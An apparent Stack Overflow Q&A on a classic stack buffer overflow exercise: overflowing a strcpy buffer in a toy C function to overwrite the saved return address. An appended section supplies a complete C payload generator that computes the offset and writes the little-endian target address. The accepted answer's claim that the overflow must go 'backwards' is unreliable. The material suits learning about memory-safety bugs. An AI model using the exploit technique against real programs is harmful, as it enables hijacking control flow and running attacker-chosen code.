
So I am trying to modify the return address of this function to make it run forever. I realize that I need to replace the return address with the address of the function; this way it will loop forever.

Here is the code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void win(char * arg)
{

    char name[16];
    char * stuff[4] = {"TV", "Phone", "Car", "Cash"};

    strcpy(name, arg);   /* no length check: an arg longer than 15 bytes overflows name */
    printf("Your name is %s:\n", name);
    printf("Here you can use this to win %s!\n", stuff[rand()%4]);
    printf("Here is the number %d\n\n", rand());
}

arg is just argv[1]

I used gdb to get the address of the win function, which is 0x8048530. I used the info frame command to look at the saved eip (which is the return address, correct?) and it is 0x804862c. I believe to get to the return address I need to overflow name[]. I am guessing I can somehow calculate exactly where I can insert the address of win to overwrite the return address. So something like name[23]. The address of name[0] is 0xbffffaa0 and the address of name[16] is 0xbffffab0. The address of arg is 0xbffffac0. So that is all the information I know. I am just struggling to put it all together to cause the attack. Apparently if I cause name to overflow it will go into stuff, but I need to change the return address so I need to go the other way. How can I do that using a buffer overflow attack?

Johsh Hanks

1 Answer

By overflowing name, you'll corrupt the local variable that resides after it, stuff in this case. In order to rewrite the return address, you need to go back in the stack, not forward.

This answer has a nice sketch of stack layout.

SomeWittyUsername
  • So after looking at the sketch you provided, the return address lies between arg and name[], correct? This kind of confuses me more as to how I can cause a buffer overflow attack but have it go backwards – Johsh Hanks Feb 21 '14 at 16:33
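The following is an added example, not code from the question or the answer above. On 32-bit x86 the stack grows toward lower addresses, so the saved eip that win() returns through sits at a higher address than name, and strcpy writes upward from name[0]; the overflow reaches the return address by writing past the end of name, across whatever the compiler placed in between, without any "backwards" write. The program below computes that distance from the two stack addresses and emits the argv[1] string. NAME_ADDR and WIN_ADDR are the values posted in the question; RET_SLOT is an assumption: the posted address of arg, 0xbffffac0, is taken to be the first parameter slot (ebp+8 under the 32-bit cdecl convention), which puts the saved eip one word below it at 0xbffffabc. The filler byte and the output format are also my choices. gdb's "info frame" prints the slot address directly ("eip at 0x..."), so substitute that value if it differs.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stack slots observed in gdb for the posted win() on 32-bit x86.
 * NAME_ADDR and WIN_ADDR come from the question. RET_SLOT is an
 * assumption: &arg = 0xbffffac0 is the parameter slot at ebp+8 under
 * cdecl, so the saved eip sits one word below it at ebp+4. */
#define NAME_ADDR 0xbffffaa0u
#define RET_SLOT  0xbffffabcu
#define WIN_ADDR  0x08048530u
#define FILL_BYTE 'A'   /* arbitrary non-NUL filler */

/* Distance in bytes from name[0] to the saved return address.
 * Only this difference matters; the absolute stack addresses do not
 * have to be the same outside gdb, since the frame layout is fixed. */
size_t ret_offset(uint32_t name_addr, uint32_t ret_slot)
{
    return (size_t)(ret_slot - name_addr);
}

/* strcpy stops at the first NUL, so every byte up to and including the
 * target address must be non-zero. Returns 1 if the payload is copied
 * in full, 0 if strcpy would truncate it. */
int survives_strcpy(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return 0;
    return 1;
}

/* Build the argv[1] string: filler up to the saved eip slot, then the
 * target address in little-endian byte order, then the terminating NUL
 * that strcpy copies as well. Returns the byte count before the NUL,
 * or 0 if out cannot hold the payload plus its terminator. */
size_t build_payload(uint32_t name_addr, uint32_t ret_slot, uint32_t target,
                     unsigned char *out, size_t cap)
{
    size_t off = ret_offset(name_addr, ret_slot);
    size_t len = off + 4;
    if (len + 1 > cap)
        return 0;
    memset(out, FILL_BYTE, off);
    out[off + 0] = (unsigned char)(target & 0xffu);
    out[off + 1] = (unsigned char)((target >> 8) & 0xffu);
    out[off + 2] = (unsigned char)((target >> 16) & 0xffu);
    out[off + 3] = (unsigned char)((target >> 24) & 0xffu);
    out[len] = 0;
    return len;
}

/* Writes the payload to stdout so it can be passed as
 * ./prog "$(./payload)"; no trailing newline is printed. */
int main(void)
{
    unsigned char buf[64];
    size_t len = build_payload(NAME_ADDR, RET_SLOT, WIN_ADDR, buf, sizeof buf);
    if (len == 0 || !survives_strcpy(buf, len)) {
        fprintf(stderr, "payload too large or contains a NUL byte\n");
        return 1;
    }
    fwrite(buf, 1, len, stdout);
    return 0;
}
```

With the assumed slot the offset is 28, so the four bytes at name[28..31] are the ones that become the new return address, and the win address 0x08048530 encodes as 30 85 04 08 with no NUL byte, which is why it survives strcpy. The stack addresses from gdb only serve to compute that offset; the overwrite value is a code address in a non-PIE binary, so the payload does not depend on the stack being at the same place outside the debugger.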